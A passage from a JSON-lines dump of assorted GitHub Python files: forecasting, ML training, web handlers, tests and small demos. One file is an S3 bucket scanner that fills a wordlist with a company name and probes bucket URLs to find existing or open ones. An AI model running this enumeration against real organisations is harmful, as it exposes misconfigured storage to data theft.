columnas:\n\n * La fecha.\n\n * El precio promedio real de la electricidad.\n\n * El pronóstico del precio promedio real.\n\n\n \"\"\"\n try :\n\n data = leer_datos()\n modelo = load_model()\n\n y_scaled_m1 = modelo.predict(data[0])\n df_y_m1 = pd.DataFrame(get_precio_transformado(y_scaled_m1)).rename(\n columns={0: \"pronostico\"}\n )\n df_z = get_datos_reales()\n\n df_completo = df_y_m1.join(df_z)[[\"fecha\", \"precio\", \"pronostico\"]]\n\n df_completo.to_csv(path_salida, index=False, header=True)\n\n # raise NotImplementedError(\"Implementar esta función\")\n except:\n return False\n\ndef leer_datos():\n datos = pd.read_csv(path_archivo)\n return (\n datos[[str(i) for i in range(13)]].to_numpy(),\n datos[\"precio_transformado\"].to_numpy(),\n )\n\n\ndef load_model():\n\n modelo = pickle.load(open(path_modelo, \"rb\"))\n\n return modelo\n\n\ndef get_precio_transformado(y_scaled_m1):\n\n df = pd.read_csv(path_datos)\n data = list(df[\"precio\"])\n # crea el transformador\n scaler = MinMaxScaler()\n\n # escala la serie\n data_scaled = scaler.fit_transform(np.array(data).reshape(-1, 1))\n\n # z es un array de listas como efecto\n # del escalamiento\n data_scaled = [u[0] for u in data_scaled]\n\n y_m1 = scaler.inverse_transform([[u] for u in y_scaled_m1])\n y_m1 = [u[0] for u in y_m1]\n\n return y_m1\n\n\ndef get_datos_reales():\n df = pd.read_csv(path_datos)\n return df[[\"fecha\", \"precio\"]]\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n make_forecasts()\n","repo_name":"productos-de-datos/proyecto-lgdiazf-unal","sub_path":"src/models/make_forecasts.py","file_name":"make_forecasts.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14782642812","text":"from re import X\nfrom time import sleep\n\ndef compute():\n li = []\n for i in range(10):\n li.append(i)\n sleep(.5)\n return li\n\n\n\n#print(compute())\n\nclass Compute:\n def __call__(self):\n li = []\n for i in range(10):\n li.append(i)\n sleep(.5)\n return li\n\n\n\n\n\nclass Computer:\n def __iter__(self):\n self.last = 0\n return self\n \n def __next__(self):\n if self.last > 5:\n raise StopIteration\n else:\n self.last += 1\n return self.last\n\ncompute = Computer()\nit = iter(compute)\n\n#print(next(it))\n\n\n#for i in compute:\n# print(i)\n\n\ndef gen_compute(x):\n for i in range(x):\n yield i\n\nit = gen_compute(100000)\n\n\nli_comprehension = [i for i in range(10)]\n\n#print(li_comprehension)\n\n","repo_name":"EskilWennevold/Python","sub_path":"Generator/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73339628889","text":"import json\nfrom flask import Response\nfrom flask_restful import Resource, reqparse\n\nfrom backend.evaluate.heuristics.core import ALL_HEURISTICS\n\n\nclass Heuristics(Resource):\n def get(self):\n heuristics = [\n {\n 'name': x.motivator,\n 'description': x.description,\n 'key': x.key,\n 'id': x.id,\n } for x in ALL_HEURISTICS\n ]\n\n return heuristics\n","repo_name":"thundergolfer/source-rank","sub_path":"backend/resources/heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35359596063","text":"import torchvision.datasets\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom PIL import Image\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torchvision import transforms\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD\nimport timm\n\nfrom utils import show_graphs\n\ndef main():\n image_size = 224\n # mean = (0.485, 0.456, 0.406)\n mean = IMAGENET_DEFAULT_MEAN # -> (0.485, 0.456, 0.406) 値は一緒だった。\n # std = (0.229, 0.224, 0.225)\n std = IMAGENET_DEFAULT_STD # -> (0.229, 0.224, 0.225) 値は一緒だった。\n\n train_image_dir = '../data/train'\n val_image_dir = '../data/val'\n\n data_transform = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(\n image_size, scale=(0.5, 1.0)\n ),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(degrees=[-15, 15]),\n transforms.ToTensor(),\n transforms.Normalize(mean, std),\n transforms.RandomErasing(0.5),\n ]),\n 'val': transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n }\n\n train_dataset = torchvision.datasets.ImageFolder(root=train_image_dir, transform=data_transform['train'])\n val_dataset = torchvision.datasets.ImageFolder(root=val_image_dir, transform=data_transform['val'])\n\n batch_size = 32\n\n train_dataLoader = torch.utils.data.DataLoader(\n train_dataset, batch_size=batch_size, shuffle=True\n )\n val_dataLoader = torch.utils.data.DataLoader(\n val_dataset, batch_size=batch_size, shuffle=False\n )\n\n dataloaders_dict = {'train': train_dataLoader, 'val': val_dataLoader}\n\n # 学習済みのVision Transferモデルをロード\n model = timm.create_model('vit_base_patch16_224', pretrained=True, num_classes=2)\n\n # 損失関数はクロスエントロピー\n loss_func = nn.CrossEntropyLoss()\n\n # 最適化手法を設定\n params_to_update = []\n update_param_names = ['head.weight', 'head.bias']\n\n for name, param in model.named_parameters():\n if name in update_param_names:\n param.requires_grad = True\n params_to_update.append(param)\n else:\n param.requires_grad = False\n\n # 最適化アルゴリズム\n optimizer = optim.SGD(params=params_to_update, lr=0.001, momentum=0.9)\n\n num_epochs = 50\n train_model(model, dataloaders_dict, loss_func, optimizer, num_epochs=num_epochs)\n\n torch.save(model.state_dict(), 'pytorch_vit_transfered_model.pth')\n\n# ImageFolderに画像を読み込ませるときにすべてRGBに変換する処理\ndef myloader(filename):\n return Image.open(filename).convert('RGB')\n\n# モデルを学習させる関数を作成\ndef train_model(net, dataloaders_dict, loss_func, optimizer, num_epochs):\n train_loss = []\n val_loss = []\n train_acc = []\n val_acc = []\n\n # epochのループ\n for epoch in range(num_epochs):\n print(f'Epoch {epoch+1} / {num_epochs}')\n print('-------------')\n\n for phase in ['train', 'val']:\n\n if phase == 'train':\n net.train()\n else:\n net.eval()\n\n epoch_loss = 0.0 # epochの損失和\n epoch_corrects = 0 # epochの正解数\n\n # データローダーからミニバッチを取り出すループ\n for inputs, labels in tqdm(dataloaders_dict[phase]):\n\n # optimizerを初期化\n optimizer.zero_grad()\n\n # forward計算\n with torch.set_grad_enabled(phase == 'train'):\n outputs = net(inputs)\n loss = loss_func(outputs, labels)\n _, preds = torch.max(outputs, 1)\n\n # 訓練時はバックプロパゲーションを行う\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # イテレーション結果の計算\n # lossの合計を更新\n epoch_loss += loss.item() * inputs.size(0)\n # 正解数の合計を更新\n epoch_corrects += torch.sum(preds == labels.data)\n\n\n # epochごとのlossと正解率を表示\n epoch_loss = epoch_loss / len(dataloaders_dict[phase].dataset)\n epoch_acc = epoch_corrects.double() / len(dataloaders_dict[phase].dataset)\n\n # epochごとの値を格納\n if phase == 'train':\n train_loss.append(epoch_loss)\n train_acc.append(epoch_acc)\n elif phase == 'val':\n val_loss.append(epoch_loss)\n val_acc.append(epoch_acc)\n\n print(f'{phase} Loss {epoch_loss:.4f} Acc: {epoch_acc:.4f}')\n\n models_name = 'ViTTransfered'\n show_graphs(num_epochs, train_loss, val_loss, train_acc, val_acc, models_name)\n\nif __name__ == '__main__':\n main()","repo_name":"coticoticotty/matuo_or_parkseojun","sub_path":"script/vit_transformed.py","file_name":"vit_transformed.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27708168219","text":"# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\n\"\"\"Test module for the BatchHandler handler.\"\"\"\n\nimport concurrent.futures\nimport json\nimport mock\nimport mongomock\nimport tornado\nimport tornado.testing\n\nimport handlers.app\nimport urls\n\n# Default Content-Type header returned by Tornado.\nDEFAULT_CONTENT_TYPE = 'application/json; charset=UTF-8'\n\n\nclass TestBatchHandler(\n tornado.testing.AsyncHTTPTestCase, tornado.testing.LogTrapTestCase):\n\n def setUp(self):\n self.mongodb_client = mongomock.Connection()\n super(TestBatchHandler, self).setUp()\n\n patched_find_token = mock.patch(\n \"handlers.base.BaseHandler._find_token\")\n self.find_token = patched_find_token.start()\n self.find_token.return_value = \"token\"\n\n patched_validate_token = mock.patch(\"handlers.common.validate_token\")\n self.validate_token = patched_validate_token.start()\n self.validate_token.return_value = (True, \"token\")\n\n self.addCleanup(patched_find_token.stop)\n self.addCleanup(patched_validate_token.stop)\n\n def get_app(self):\n dboptions = {\n 'dbpassword': \"\",\n 'dbuser': \"\"\n }\n\n settings = {\n 'dboptions': dboptions,\n 'client': self.mongodb_client,\n 'executor': concurrent.futures.ThreadPoolExecutor(max_workers=2),\n 'default_handler_class': handlers.app.AppHandler,\n 'debug': False\n }\n\n return tornado.web.Application([urls._BATCH_URL], **settings)\n\n def get_new_ioloop(self):\n return tornado.ioloop.IOLoop.instance()\n\n def test_delete_no_token(self):\n response = self.fetch('/batch', method='DELETE')\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_delete_with_token(self):\n headers = {'Authorization': 'foo'}\n\n response = self.fetch(\n '/batch', method='DELETE', headers=headers,\n )\n\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_get_no_token(self):\n response = self.fetch('/batch', method='GET')\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_get_with_token(self):\n headers = {'Authorization': 'foo'}\n\n response = self.fetch(\n '/batch', method='GET', headers=headers,\n )\n\n self.assertEqual(response.code, 501)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_without_token(self):\n self.find_token.return_value = None\n\n batch_dict = {\n \"batch\": [\n {\"method\": \"GET\", \"collection\": \"count\", \"operation_id\": \"foo\"}\n ]\n }\n body = json.dumps(batch_dict)\n\n response = self.fetch('/batch', method='POST', body=body)\n\n self.assertEqual(response.code, 403)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_not_json_content(self):\n headers = {'Authorization': 'foo', 'Content-Type': 'application/json'}\n\n response = self.fetch(\n '/batch', method='POST', body='', headers=headers\n )\n\n self.assertEqual(response.code, 422)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_wrong_content_type(self):\n headers = {'Authorization': 'foo'}\n\n response = self.fetch(\n '/batch', method='POST', body='', headers=headers\n )\n\n self.assertEqual(response.code, 415)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n def test_post_wrong_json(self):\n headers = {'Authorization': 'foo', 'Content-Type': 'application/json'}\n\n body = json.dumps(dict(foo='foo', bar='bar'))\n\n response = self.fetch(\n '/batch', method='POST', body=body, headers=headers\n )\n\n self.assertEqual(response.code, 400)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n\n @mock.patch(\"taskqueue.tasks.run_batch_group\")\n def test_post_correct(self, mocked_run_batch):\n headers = {'Authorization': 'foo', 'Content-Type': 'application/json'}\n batch_dict = {\n \"batch\": [\n {\"method\": \"GET\", \"collection\": \"count\", \"operation_id\": \"foo\"}\n ]\n }\n body = json.dumps(batch_dict)\n\n mocked_run_batch.return_value = {}\n\n response = self.fetch(\n '/batch', method='POST', body=body, headers=headers\n )\n\n self.assertEqual(response.code, 200)\n self.assertEqual(\n response.headers['Content-Type'], DEFAULT_CONTENT_TYPE)\n mocked_run_batch.assert_called_once_with(\n [\n {\n 'operation_id': 'foo',\n 'method': 'GET',\n 'collection': 'count'\n }\n ],\n {\n 'dbuser': '',\n 'dbpassword': ''\n }\n )\n","repo_name":"joyxu/kernelci-backend","sub_path":"app/handlers/tests/test_batch_handler.py","file_name":"test_batch_handler.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25341430900","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import DetailView, ListView, RedirectView, UpdateView\n\nfrom openapi_documentor.openapi.models import Document\n\nUser = get_user_model()\n\n\nclass UserApiView(LoginRequiredMixin, ListView):\n context_object_name = \"apis\"\n paginate_by = 10\n template_name = \"user_apis.html\"\n\n def get_queryset(self):\n username = self.kwargs.get(\"username\", None)\n if username:\n return Document.objects.filter(owner__username=username)\n else:\n return Document.objects.none()\n\n\nuser_api_view = UserApiView.as_view()\n\n\nclass UserDetailView(LoginRequiredMixin, DetailView):\n\n model = User\n slug_field = \"username\"\n slug_url_kwarg = \"username\"\n\n\nuser_detail_view = UserDetailView.as_view()\n\n\nclass UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):\n\n model = User\n fields = [\"name\"]\n success_message = _(\"Information successfully updated\")\n\n def get_success_url(self):\n return self.request.user.get_absolute_url() # type: ignore [union-attr]\n\n def get_object(self):\n return self.request.user\n\n\nuser_update_view = UserUpdateView.as_view()\n\n\nclass UserRedirectView(LoginRequiredMixin, RedirectView):\n\n permanent = False\n\n def get_redirect_url(self):\n return reverse(\"users:detail\", kwargs={\"username\": self.request.user.username})\n\n\nuser_redirect_view = UserRedirectView.as_view()\n","repo_name":"codeasashu/openapi-documentor","sub_path":"openapi_documentor/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72715477847","text":"\n# Window Configure\nWIDTH, HEIGHT = 900, 650\n\n# Agent Configure\nMOVE_COEF = 4 # Speed of the Paddle \nPADDLE_HEIGHT = 60\nPADDLE_WIDTH = 10\n\n# Ball Configure\nBALL_Xspeed = 3\nBALL_Yspeed = 3\n\n# Hyperparameter Configure\nlearning_rate = 0.0004 \nent_coef = 0.01 \ngamma = 0.95 \ngae_lambda = 0.95\nmax_grad_norm = 0.5\n\ntotal_timesteps = 50000\n\n# Model Configure \nModel_Save_Path = \"./models/\" + str(int(total_timesteps/1000)) + \"k.zip\" \n# Indicates the model path which will save after the training, \n\ntensorboard_log = \"./Pong_Log/\"\ntensorboard_sub_folder = 'PA_' + str(total_timesteps/1000) + \"k\"\n","repo_name":"RsGoksel/Reinforcement-Learning-PongGame","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"9294179407","text":"import requests\nimport time\nimport threading\nfrom termcolor import colored as c\n\ndef thread(company):\n global buckets, cur_running\n cur_running += 1\n\n url = f\"http://{company}.s3.amazonaws.com\"\n try:\n req = requests.get(url, timeout=5)\n except:\n cur_running -= 1\n exit()\n if req.status_code != 404:\n template = f\"{url} {req.status_code}\"\n if req.status_code == 403 or req.status_code == 401:\n template = c(template, 'red')\n elif req.status_code == 200:\n template = c(template, 'yellow')\n else:\n template = c(template, 'magenta')\n buckets.append(template)\n cur_running -= 1\n\ndef scan(company,wordlist_path,threads):\n global buckets, cur_running\n cur_running = 0\n buckets = []\n wordlist = f\"{wordlist_path}/wordlists/s3_fuzz.txt\"\n lines = open(wordlist).readlines()\n for line in lines:\n line = line.strip()\n line = line.replace(\"⦗DOMAIN⦘\", company)\n while cur_running >= threads:\n time.sleep(0.5)\n threading.Thread(target=thread, args=(line,)).start()\n while cur_running != 0:\n time.sleep(0.5)\n return buckets\n ","repo_name":"R00tendo/awacs-scanner","sub_path":"awacs_core/scan/s3_bucket_scanner.py","file_name":"s3_bucket_scanner.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"36262873938","text":"import RPi.GPIO as GPIO\nimport dht11\nimport time\nfrom firebase import firebase\n# initialize GPIO\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n#GPIO.cleanup()\nfirebase=firebase.FirebaseApplication(\"firebasedburl\",None)\n# read data using Pin GPIO21 \ninstance = dht11.DHT11(pin=21)\n\nwhile True:\n result = instance.read()\n if result.is_valid():\n print(\"Temp: %d C\" % result.temperature +' '+\"Humid: %d %%\" % result.humidity)\n resultt=firebase.put(\"\",\"temp\",result.temperature)\n resultt=firebase.put(\"\",\"humidity\",result.humidity)\n time.sleep(1)\n","repo_name":"doyelsaha510/humiditytemperaturedht11","sub_path":"temp_humidity.py","file_name":"temp_humidity.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6080672961","text":"from mock import Mock\nfrom mock import patch\nimport os\n\nfrom nailgun.test.base import BaseTestCase\n\nfrom nailgun.statistics import errors\nfrom nailgun.statistics import utils\n\n\nclass TestUtilsFunctions(BaseTestCase):\n\n def test_set_proxy_func(self):\n def check_proxy():\n with utils.set_proxy(new_proxy):\n self.assertEqual(os.environ.get(\"http_proxy\"), new_proxy)\n self.assertEqual(os.environ.get(\"https_proxy\"), new_proxy)\n\n def raise_inside_context():\n with utils.set_proxy(new_proxy):\n raise Exception(\"Just an error\")\n\n expected = {\"http_proxy\": \"test_http\", \"https_proxy\": \"test_https\"}\n new_proxy = \"fake_proxy\"\n\n # check that proxy old value is restored\n # after exit from context manager w/ and w/o exception\n with patch.dict(\"os.environ\", expected):\n check_proxy()\n self.assertEqual(os.environ.get(\"http_proxy\"),\n expected[\"http_proxy\"])\n self.assertEqual(os.environ.get(\"https_proxy\"),\n expected[\"https_proxy\"])\n\n raise_inside_context()\n self.assertEqual(os.environ.get(\"http_proxy\"),\n expected[\"http_proxy\"])\n self.assertEqual(os.environ.get(\"https_proxy\"),\n expected[\"https_proxy\"])\n\n # check that env variable is deleted\n # after exit from context manager w/ and w/o exception\n check_proxy()\n self.assertNotIn(\"http_proxy\", os.environ)\n self.assertNotIn(\"https_proxy\", os.environ)\n\n raise_inside_context()\n self.assertNotIn(\"http_proxy\", os.environ)\n self.assertNotIn(\"https_proxy\", os.environ)\n\n def test_get_attr_value(self):\n attributes = {\n 'a': 'b',\n 'c': [\n {'x': 'z', 'y': [{'t': 'u'}, {'v': 'w'}, {'t': 'u0'}]},\n {'x': 'zz', 'y': [{'t': 'uu'}, {'v': 'ww'}]}\n ],\n 'd': {'f': 'g', 'k': [0, 1, 2]},\n }\n white_list = (\n utils.WhiteListRule(('a',), 'map_a', None),\n utils.WhiteListRule(('d', 'f'), 'map_f', None),\n utils.WhiteListRule(('d', 'k'), 'map_k_len', len),\n utils.WhiteListRule(('c', 'x'), 'map_x', None),\n utils.WhiteListRule(('c', 'y', 't'), 'map_t', None),\n )\n\n actual = {}\n for rule in white_list:\n actual[rule.map_to_name] = utils.get_attr_value(\n rule.path, rule.transform_func, attributes)\n\n expected = {\n 'map_f': 'g',\n 'map_k_len': 3,\n 'map_a': 'b',\n 'map_x': ['z', 'zz'],\n 'map_t': [['u', 'u0'], ['uu']],\n }\n self.assertDictEqual(actual, expected)\n\n def test_get_online_controller(self):\n node_name = \"test\"\n self.env.create(\n nodes_kwargs=[{\"online\": True,\n \"roles\": [\"controller\"],\n \"name\": node_name}]\n )\n\n cluster = self.env.clusters[0]\n online_controller = utils.get_online_controller(cluster)\n self.assertIsNotNone(online_controller)\n self.assertEqual(online_controller.name, node_name)\n\n cluster.nodes[0].online = False\n self.assertRaises(errors.NoOnlineControllers,\n utils.get_online_controller,\n cluster)\n\n def test_get_nested_attr(self):\n expected_attr = Mock()\n intermediate_attr = Mock(spec=[\"expected_attr\"])\n containing_obj = Mock(spec=[\"intermediate_attr\"])\n\n intermediate_attr.expected_attr = expected_attr\n containing_obj.intermediate_attr = intermediate_attr\n\n existing_attr_path = [\"intermediate_attr\", \"expected_attr\"]\n self.assertEqual(\n expected_attr,\n utils.get_nested_attr(containing_obj, existing_attr_path)\n )\n\n missing_attrs_pathes = [\n [\"missing_attr\", \"expected_attr\"],\n [\"intermediate_attr\", \"missing_attr\"],\n ]\n for attr_path in missing_attrs_pathes:\n self.assertIsNone(\n utils.get_nested_attr(containing_obj, attr_path)\n )\n","repo_name":"thomasgoirand/fuel-nailgun","sub_path":"nailgun/test/unit/fuel_statistics_tests/test_utils_functions.py","file_name":"test_utils_functions.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72774847127","text":"#Class Title\r\n\r\nimport PySimpleGUI as sg\r\n\r\nimport DBServer as DB\r\n\r\nsg.theme('DarkBlack1')\r\n\r\nclass Title: # That class represents notes for one studeing metter\r\n\r\n def __init__(self, titleName, user = 'user',*spentTime):\r\n self.titleName = titleName\r\n self.user = user\r\n self.spentTime = spentTime\r\n\r\n #gef get_data_from_db(self): # That function is in control of reading data from the data base\r\n\r\n def appirance(self): # That function returnes the look of the note\r\n\r\n topic = 'Notes for: ' + self.titleName\r\n timeInvolved = f'Studyed for {self.spentTime[0]} days, {self.spentTime[1]} hours and {self.spentTime[2]} minutes.'\r\n\r\n litTableName = DB.input_modifier(self.titleName, self.user)+'topicTitles'\r\n litDict = {}\r\n litDict = DB.get_literature_dict(litTableName) # !! We need a func that going to resive title-name and open exact file. So title-name is 'key' and path to the file is 'value'\r\n \r\n layout = [\r\n [sg.Text(Text =topic, auto_size_text=True)],\r\n [sg.Text(Text =timeInvolved, auto_size_text=True), sg.Button('-TSTART-')],\r\n [sg.Combo(DB.get_literature_list(litTableName), bind_return_key=True, enable_events=True, readonly=True, k='-COMBO-')],\r\n [sg.Multiline(default_text='Tipe your notes in here.', size=(200,200,), key='-LOG-')],\r\n [sg.Input(key='-IN-', size=(10,1)), sg.CalendarButton('Choose date', close_when_date_chosen=True, target='-IN-', location=(0,0), format='%d.%m.%Y', no_titlebar=False, )]\r\n ]\r\n\r\n return sg.Tab(self.titleName, layout)\r\n\r\n #def save_result(self): # That function updates data in datdbase.\r\n","repo_name":"BochkarevArtem-ThomasCooper/Organizer-for-study","sub_path":"Class_Title.py","file_name":"Class_Title.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"865287508","text":"from __future__ import print_function, division\n\nfrom thinkbayes2 import Suite\n\n\nclass Monty(Suite):\n def Likelihood(self, data, hypo):\n \"\"\"Computes the likelihood of the data under the hypothesis.\n\n hypo: string name of the door where the prize is\n data: string name of the door Monty opened\n \"\"\"\n if hypo == data:\n return 0\n elif hypo == 'A':\n return 0.5\n else:\n return 1\n\n\ndef main():\n suite = Monty('ABC')\n suite.Update('B')\n suite.Print()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AllenDowney/ThinkBayes2","sub_path":"scripts/monty2.py","file_name":"monty2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1654,"dataset":"github-code","pt":"31"} +{"seq_id":"9667252817","text":"import xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as font_manager\n\n\ntree = ET.parse('每人每月薪資.xml')\nroot = tree.getroot()\n\n\ndata_set = dict()\nfor series_node in root.findall('./DataSet/Series'):\n item_name = series_node.get('ITEM')\n\n # 先只計算合計,不管男女\n if '合計' not in item_name:\n continue\n\n industry = item_name.replace(\"-合計(新台幣元)\", \"\")\n\n data_set[industry] = float(series_node.find(\n './SeriesProperty[@SERIESTYPE=\"原始值\"]/Obs[@TIME_PERIOD=\"2015\"]'\n ).get('OBS_VALUE'))\n\n# 行業列表(根據薪資排序)\nindustries = sorted(data_set, key=lambda industry: data_set[industry])\n\n# 對應的薪資列表\nsalaries = [data_set[industry] for industry in industries]\n\n# 設定中文字體\nfont = font_manager.FontProperties(fname='./mingliu.ttc')\n\n# 建立一個可以實際放圖表的地方 (figsize 可以指定大小)\nfig = plt.figure(figsize=(20, 20))\n\n# 在上面建一個可以畫圖的區域 Axes\nax = fig.add_subplot(1, 1, 1)\n\n# http://matplotlib.org/api/lines_api.html\nax.barh(range(len(industries)), salaries)\n\nax.set_title(\"歷年來「資訊及通訊傳播業」和其他行業比較\", fontsize=25, fontproperties=font)\n\nax.set_xlabel(\"收入\", fontproperties=font, fontsize=20)\n\nax.set_ylim([0, len(industries)])\nax.set_ylabel(\"行業類別\", fontproperties=font, fontsize=20)\nax.set_yticks([a + 0.5 for a in range(len(industries))])\nyticklabels = ax.set_yticklabels(industries, fontproperties=font, fontsize=16)\n\ntarget_label = yticklabels[industries.index(\"資訊及通訊傳播業\")]\ntarget_label.set_color('red')\n\nplt.show()\n","repo_name":"marco79423/mysite","sub_path":"content/articles/使用 Python 的生活日常系列 [2] - 超簡易資料分析/files/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13946547859","text":"\"\"\"\nCreates worksheet state from files needed to view a worksheet.\n\"\"\"\nimport json\nimport gzip\nfrom cluster.api.user import dataframe_to_str, bubble_table\nimport pandas as pd\n\n\ndef read_genes_csv(filename):\n df = pd.read_csv(filename, index_col=0)\n genes = set()\n for index, row in df.iterrows():\n row.dropna(inplace=True)\n genes = genes.union(set(row.astype(str).tolist()))\n\n return list(genes)\n\n\ndef write_gzip_state(out_file, marker_dicts):\n with gzip.GzipFile(out_file, 'w') as fout:\n fout.write(json.dumps(marker_dicts).encode('utf-8'))\n\n\ndef generate_worksheet_state(\n user_email,\n worksheet_name,\n dataset_name,\n clustering,\n size_by,\n color_by,\n markers_df=None,\n genes=[],\n mapping=None,\n dotplot_metrics = None,\n group = None,\n cluster_name = None,\n dataset = None,\n description = None,\n):\n \"\"\"\n\n :param user_email:\n :param worksheet_name:\n :param dataset_name:\n :param markers_df:\n :param size_by:\n :param color_by:\n :param clustering:\n :return:\n \"\"\"\n\n\n no_genes = len(genes) == 0\n if no_genes:\n genes_df = pd.DataFrame(columns=[\"row\", \"genes\"])\n colors = empty_bubble_table(clustering)\n sizes = empty_bubble_table(clustering)\n clusters = cluster_table(clustering, mapping=mapping)\n\n else:\n colors = bubble_table(markers_df, genes, color_by)\n sizes = bubble_table(markers_df, genes, size_by)\n sizes.fillna(0, inplace=True)\n #row_order = seriate(pdist(sizes))\n row_order = range(0, len(genes))\n genes_df = pd.DataFrame({\"row\": row_order, \"genes\": genes})\n #col_order = seriate(pdist(sizes.transpose()))\n clusters = cluster_table(clustering, order=None, mapping=mapping)\n\n colors.fillna(0, inplace=True)\n\n jdict = {\n \"source_user\": user_email, \"source_worksheet_name\": worksheet_name,\n \"dataset_name\": dataset_name,\n \"size_by\": size_by,\n \"color_by\": color_by,\n \"clusters\": dataframe_to_str(clusters, index=False),\n \"genes\": dataframe_to_str(genes_df, index=False),\n \"colors\": dataframe_to_str(colors),\n \"sizes\": dataframe_to_str(sizes),\n}\n\n if dotplot_metrics is not None:\n jdict[\"dotplot_vars\"] = dotplot_metrics\n\n if group is not None:\n jdict[\"group\"] = group\n\n if cluster_name is not None:\n jdict[\"cluster_name\"] = cluster_name\n\n if dataset is not None:\n jdict[\"dataset\"] = dataset\n\n if description is not None:\n jdict[\"description\"] = description\n\n return jdict\n\n\ndef empty_bubble_table(clustering):\n colnames = clustering.unique().tolist()\n\n colnames.insert(0, \"gene\")\n return pd.DataFrame(columns=colnames)\n\n\ndef cluster_table(clustering, order=None, mapping=None):\n \"\"\"\n\n :param clustering:\n :param order:\n :param mapping: pandas series with indecies as cluster names.\n :return:\n \"\"\"\n cluster_counts = clustering.value_counts()\n\n df = pd.DataFrame(\n columns=[\"column\", \"cluster\",\t\"cell_count\", \"bar_color\", \"cell_type\"],\n index=range(len(cluster_counts))\n )\n if mapping is not None:\n mapping = mapping.sort_values()\n df[\"column\"] = range(len(cluster_counts))\n df[\"cell_type\"] = mapping.values\n celltype_col = df[[\"column\", \"cell_type\"]]\n celltype_col = celltype_col.groupby(\"cell_type\").first()['column']\n print(celltype_col)\n for ct in mapping.unique():\n indxs = df.index[df[\"cell_type\"] == ct]\n df.loc[indxs, \"bar_color\"] = celltype_col.loc[ct]\n\n df[\"column\"] = range(len(cluster_counts))\n df[\"cell_type\"] = mapping.values\n df[\"cluster\"] = mapping.index.tolist()\n df[\"cell_count\"] = cluster_counts[mapping.index].values\n\n else:\n df[\"column\"] = range(len(cluster_counts))\n df[\"cluster\"] = cluster_counts.index\n df[\"cell_count\"] = cluster_counts.values\n df[\"bar_color\"] = 0\n #df[\"cell_type\"] = \"Unknown\"\n\n print(\"clusters df in state with mapping\", mapping)\n print(df.head())\n return df\n\n\ndef find_genes(marker_df, size=\"pct.1\", color=\"avg_diff\"):\n \"\"\"\n Hack to pick genes to show on dotplot by multiplying size and color variable.\n :param marker_dicts:\n 